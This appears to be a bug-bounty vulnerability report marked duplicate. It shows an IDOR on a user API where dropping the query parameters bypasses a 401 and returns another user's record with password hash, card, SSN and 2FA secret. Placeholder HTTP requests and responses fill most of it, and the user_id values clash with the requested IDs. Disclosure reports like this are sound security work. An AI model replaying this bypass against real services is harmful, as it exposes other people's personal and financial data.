IDOR bypassed 401 leading to a leak of personal data


Short Description
I found an Insecure Direct Object Reference (IDOR) vulnerability in the GET /api/user/[id] endpoint. With the original query parameters in place, the system responded 401 Unauthorized when I requested another user's record. Once those parameters were removed from the URL, however, the same endpoint returned a successful response containing the other user's personal data, without any proper authorization check.
Reproduction Steps
Log in as the ATTACKER (User A).
While browsing the profile section I found the following request:
GET /api/user/12345?token=abc123xyz&include=profile,contacts,settings HTTP/1.1
Host: target-website.com
Cookie: session_id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.fake.jwt.token; theme=dark; locale=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Referer: https://target-website.com/dashboard
This request returns the personal data of the ATTACKER's own account:
HTTP/1.1 200 OK
Content-Type: application/json
Cache-Control: no-store

{
"user_id": "1234567890",
"username": "johndoe",
"email": "johndoe@example.com",
"password_hash": "$2b$12$EixZaYVK1fsbw1ZfbX3OXe.PxoEwFv0uQ1m07QzH2dq0WyP5fpGuK",
"credit_card": { "number": "4111111111111111", "expiry": "12/25", "cvv": "123" },
"social_security_number": "123-45-6789",
"bank_account": { "account_number": "9876543210", "routing_number": "021000021" },
"jwt_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
"two_factor_secret": "JBSWY3DPEHPK3PXP"
}
Here I tried changing the ATTACKER's ID 12345 to the VICTIM's ID 12346 in order to view the victim's personal data, and it turned out I could not get it. Response: 401 Unauthorized
HTTP/1.1 401 Unauthorized
Content-Type: application/json
WWW-Authenticate: Bearer realm="example", error="invalid_token", error_description="The access token is missing or invalid."

{ "error": "unauthorized", "message": "Authentication required or invalid credentials." }
After that I tried removing every parameter from the request line, like so:
GET /api/user/12346 HTTP/1.1
Host: target-website.com
Cookie: session_id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.fake.jwt.token; theme=dark; locale=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Referer: https://target-website.com/dashboard
And it turned out this got past the 401!! I could see the VICTIM account's personal data in the response:
{
"user_id": "1234567890",
"username": "albert",
"email": "ablert@example.com",
"password_hash": "$2b$12$X5jVq3nySlDFG8WqQIwYQesJ2Rb6x9twQ4Q49gJLbYqRpItGmfP5C",
"credit_card": { "number": "5111111111111113", "expiry": "10/28", "cvv": "124" },
"social_security_number": "125-46-6889",
"bank_account": { "account_number": "9276443211", "routing_number": "023000022" },
"jwt_token": "eyJfhwefJHWHFWHjwgfhwjGEEJJRTRJWrjg...",
"two_factor_secret": "JBSEIHWHFWEIOJWRTG"
}
*Marked Duplicate
